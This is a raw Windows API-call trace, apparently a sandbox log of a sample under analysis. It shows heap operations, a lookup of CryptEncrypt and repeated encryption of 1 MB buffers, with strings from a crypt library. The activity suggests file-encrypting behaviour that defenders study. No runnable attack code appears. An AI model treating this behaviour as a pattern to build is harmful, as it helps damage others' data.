[0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0207.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0207.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0207.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0207.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c38 [0207.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0207.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0207.636] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54328 [0207.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0207.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0207.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0207.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0207.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0207.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0207.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0207.637] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x118d020*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x100000 | out: pbData=0x118d020*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0207.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0207.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0207.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0207.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0207.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0207.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0207.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0207.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0207.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0207.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0207.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0207.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0207.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0207.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0207.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0207.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0207.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0207.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0207.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0207.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0207.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0207.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0207.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0207.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0207.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0207.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0207.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0207.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0207.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0207.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0207.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0207.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0207.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129e020 [0207.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0207.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0207.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0207.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0207.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0207.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0207.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0207.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0207.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0207.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0207.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0207.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13a2020 [0207.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129e020 | out: hHeap=0x970000) returned 1 [0207.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0207.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0207.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0207.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0207.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0207.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0207.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0207.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0207.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0207.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0207.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0207.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0207.909] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0207.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0207.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0207.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0207.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0207.909] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0207.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0207.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0207.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0207.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0207.909] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0207.910] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.910] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0207.910] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.910] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.910] PeekMessageW (in: lpMsg=0x8cf158, 